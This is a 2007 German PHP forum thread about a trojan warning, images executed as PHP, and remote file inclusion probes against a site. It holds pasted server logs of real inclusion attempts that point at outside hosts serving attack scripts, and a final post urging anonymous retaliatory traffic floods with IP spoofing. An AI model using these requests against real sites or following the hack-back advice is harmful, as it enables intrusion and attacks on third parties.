php.de

Zurück   php.de > Webentwicklung > PHP-Fortgeschrittene

PHP-Fortgeschrittene Arbeiten mit PHP ohne Einschränkungen

Antwort
 
LinkBack Themen-Optionen Thema bewerten
Alt 20.09.2007, 00:51  
XLB
Erfahrener Benutzer
 
Registriert seit: 31.07.2005
Beiträge: 1.126
PHP-Kenntnisse:
Fortgeschritten
XLB
Standard

N'Abend ...

F-Secure hat beim blossen Laden der Seite schon rumgeplärrt. Das "Ding" wurde als Trojaner "PHP/Chaploit.A@expl" identifiziert, allerdings ohne weitere Angaben über die potentielle (Schad)Wirkung. Eine kurze Google-Recherche ergab ebenfalls keine weiteren Details.

Gut's Nächtle soweit ...
XLB ist offline   Mit Zitat antworten
Sponsor Mitteilung
PHP Code Flüsterer

Registriert seit: 21.08.2005
Beiträge: 4682
PHP-Kenntnisse:
Fortgeschritten

Alt 20.09.2007, 09:33  
Erfahrener Benutzer
 
Registriert seit: 17.06.2008
Beiträge: 125
squig befindet sich auf einem aufstrebenden Ast
Standard

Hola,

Zitat:
Ja das mit der IP usw als php-Bildchen ist ja kein Problem. Dann frag ich mich aber was da für ein Code oder Skript hinter dem Bild steckt. Es muss irgendwas ausgeführt werden...zumindest wurde etwas in meine temporären Dateien geladen, wo es der Virenwächter gefunden hat
man kann doch den Server, z.B. Apache, so einstellen, dass er Dateien die auf ".jpg" enden z.B. als PHP - Script ausführt.
So kann ein harmlos aussehender Bilderlink im wahrsten Sinne des Wortes als "Trojanisches Pferd" genutzt werden.


Bis dääähne.
squig ist offline   Mit Zitat antworten
Alt 20.09.2007, 11:42  
Erfahrener Benutzer
 
Registriert seit: 17.01.2006
Beiträge: 468
Slava
Standard

Zitat:
man kann doch den Server, z.B. Apache, so einstellen, dass er Dateien die auf ".jpg" enden z.B. als PHP - Script ausführt.
deshalb sage ich doch, dass es kein .httaccess in uploadordner kommen darf.

Jetzt sprechen wir mal über ein trojaner, der auf ein mal hohgeladen wird.
egal, ob man ein uloadscript hat oder nicht, ist es möglich an einen Server eine datei zu senden. Diese Datei kommt automatisch in tempordner von Apache und wird unter einem tempnamen für eine kurze zeit abgespeichert. kommt man auf die Idee die datei in tempordner zum ausführen bringen, dann ist das sehr gefährlich. Aber ich kenne kein Programm, die extra versucht die dateien im tempordner ausführen und normale weise ist der zugriff auf temp-ordner von aussen nur bei extra blöder einstellung möglich. Also haben wir mal ein Virus-script in unserem TMP-Ordner, der einfach nach gewisser zeit weggeräumt wird. Und das beste was wir machen können, diesen script nicht extra zum laufen bringen und verbieten eine .htaccess in unser webordner einzuschleusen.
__________________
Slava
http://bituniverse.com
Slava ist offline   Mit Zitat antworten
Alt 04.10.2007, 23:50  
Erfahrener Benutzer
 
Registriert seit: 14.07.2005
Beiträge: 118
saibot
Standard

Das scheint jeden Tag mehr zu werden. Hier mal ein Auszug aus 2 Tagen:
Zitat:
1010 02.10.2007 um 22:31:41 Error: 404 /index.php?site=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?
1011 02.10.2007 um 23:35:56 Error: 404 /index.php?site=http://futurehousingsystems.com/images/string.txt?
1013 03.10.2007 um 03:39:05 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1014 03.10.2007 um 03:46:21 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1015 03.10.2007 um 04:03:05 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1016 03.10.2007 um 04:22:18 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1017 03.10.2007 um 04:40:07 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1018 03.10.2007 um 04:57:11 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1019 03.10.2007 um 05:23:37 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1020 03.10.2007 um 05:29:05 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1021 03.10.2007 um 05:45:58 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1022 03.10.2007 um 05:58:53 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1027 03.10.2007 um 15:41:43 Error: 404 /index.php?site=http://www.rele.by/files/id.txt?
1028 03.10.2007 um 20:18:34 Error: 404 /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.phphttp://adriano19855.altervista.org/
1029 03.10.2007 um 20:43:10 Error: 404 /index.php?site=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?
1030 03.10.2007 um 20:43:10 Error: 404 /index.php?site=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?
1031 03.10.2007 um 21:08:19 Error: 404 /index.php?site=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?
1032 03.10.2007 um 21:11:47 Error: 404 /index.php?site=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?
1033 03.10.2007 um 21:11:55 Error: 404 /index.php?site=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?
1034 03.10.2007 um 22:08:59 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?
1035 03.10.2007 um 22:08:59 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?
1036 03.10.2007 um 22:20:49 Error: 404 /index.php?site=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?
1038 03.10.2007 um 22:59:02 Error: 404 /index.php?site=http://www.55thinking.com/echo.txt?
1043 04.10.2007 um 03:27:00 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt??
1044 04.10.2007 um 03:31:45 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt??
1045 04.10.2007 um 03:40:01 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt??
1046 04.10.2007 um 04:36:02 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?
1047 04.10.2007 um 04:36:02 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?
1048 04.10.2007 um 04:37:37 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?
1049 04.10.2007 um 04:42:08 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?
1051 04.10.2007 um 09:24:37 Error: 404 /index.php?site=http://www.infectsgroup.kit.net/infect.jpg?
1052 04.10.2007 um 12:28:36 Error: 404 /index.php?site=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?
1053 04.10.2007 um 13:55:03 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?
1054 04.10.2007 um 13:55:07 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?
1056 04.10.2007 um 21:10:43 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?
1057 04.10.2007 um 22:20:22 Error: 404 /index.php?site=http://rh4m4.110mb.com/safe.txt?
1058 04.10.2007 um 22:20:22 Error: 404 /index.php?site=http://rh4m4.110mb.com/safe.txt?
1059 04.10.2007 um 22:53:50 Error: 404 /index.php?site=http://usuarios.arnet.com.ar/larry123/safe.txt?

Was lässt sich dagegen unternehmen? Langfristig wird es wohl sinnvoll sein den Parameter "site" in irgend eine unscheinbare Buchstabenkombination umzutaufen. Aber bis Google das alles wieder indiziert hat wird ewig dauern.

Was kann man auf die schnelle tun? Hab mir überlegt, einfach bevor im Script irgendwas ausgegeben wird zu prüfen ob ein http in einem GET-Parameter vorkommt und ggf. das Script mit Exit zu beenden. Das würde unnützen Traffic sparen und diese Bots aussperren.

Hat jemand ne bessere Idee?
saibot ist offline   Mit Zitat antworten
Alt 06.10.2007, 02:07  
Erfahrener Benutzer
 
Registriert seit: 17.01.2006
Beiträge: 468
Slava
Standard

Zitat:
Was lässt sich dagegen unternehmen?
also abfangen von den parameter und ein Abbruch von der Anwendung in einem verdächtigem Fall ist nicht falsch.
andere seits, wenn du Gefühl hast, dass deine Anwendung sicher ist und die aufrufe von den Jungs kein Erfolg haben werden, dann kannst du damit ruhig weiter leben und auf 20 Hacker Zugriffen pro Tag einfach pfeifen.

Wenn die server von angreifer in EU sind, dann versuch besser der druck auf die Jungs über ihre Provider ausüben.

wenn du wirklich auf die Jungs sauer bist, und die Server von Angreifer ausserhalb von EU sind, dann schreib dir ein Roboter( am bestens in Java oder Dotnet) der von deinem PC etwa 10 Gigabyte Daten von den Angreifer pro tag absaugt (!!aber von dynamischem Content!!). hänge dabei ein parameter wo es im klartext steht, dass sie mit dem scheiss aufhören müssen und die korupte Datei von ihrem server löschen müssen (aber schreib in keinem fall deine Internet adresse, damit sie nicht genau wissen von wem das kommt). Sie werden versuchen die Roboterzugriffe selbständig abwären, aber um den Jungs die Aufgabe zu erschwären, kann man auch IP-Spoofing (Java oder .Net ist dafür kein passendes Werkzeug) anwenden.
__________________
Slava
http://bituniverse.com
Slava ist offline   Mit Zitat antworten
Antwort


Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an
Gehe zu

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Probleme mit PHP Code HappyDieMuschel PHP Tipps 2008 7 28.05.2008 06:34
Design und Code Trennen TeazY PHP Tipps 2008 29 21.05.2008 12:08
Nur bestimmten Html Code zulassen? litterauspirna PHP Tipps 2008 5 29.04.2008 12:30
einfacher Code zum Einbinden von "Inhaltsbereichen" MaxDittmann PHP-Fortgeschrittene 6 01.10.2007 15:54
bb code in htm code wandeln janni PHP Tipps 2007 2 04.11.2005 22:36
[Erledigt] JS Code in PHP Code?? HTML, Usability und Barrierefreiheit 12 08.08.2005 15:45
Seite 1/2/3..Code was haltet ihr davon? Matthiasnet PHP Tipps 2005-2 4 29.07.2005 20:29
[Erledigt] Lesbarkeit von Code Off-Topic Diskussionen 6 14.07.2005 14:48
code aus db mit eval replacen chief-thomson PHP Tipps 2005-2 4 08.07.2005 15:33
Bestätigungmail code? PHP Tipps 2005 7 16.05.2005 13:18
[Erledigt] BB Code entfernen PHP Tipps 2005 2 25.04.2005 15:20
code gesucht Beitragsarchiv 6 10.03.2005 03:14
[Erledigt] bb code innerhalb von bb code geht nicht PHP Tipps 2007 2 12.01.2005 17:29
Problem mit COde PHP Tipps 2004 5 28.08.2004 16:04

Besucher kamen über folgende Suchanfragen bei Google auf diese Seite
\spionageversuch im internet\, php/chaploit.b, 110mb.com/404.php, http://error404.com/index.php, php code injection index.php?id=4, script spionage, \index.php\ code injection, code injection php jpg, inject php code into jpg, code injection jpg, code tag bb code injection, php jpeg injection, infectsgroup.kit, spionageversuch pc, php.chaploit removal, bb code injection, jpeg code injection, txt injection, php code injection script tag, beispiel \code injection\ code in index.php

Alle Zeitangaben in WEZ +2. Es ist jetzt 21:30 Uhr.




Powered by vBulletin® Version 3.7.2 (Deutsch)
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.2.0
Aprilia-Forum, Aquaristik-Forum, Liebeskummer-Forum, Zierfisch-Forum, Geizkragen-Forum

Creative Commons License
Dieser Inhalt ist unter einer Creative Commons-Lizenz lizenziert.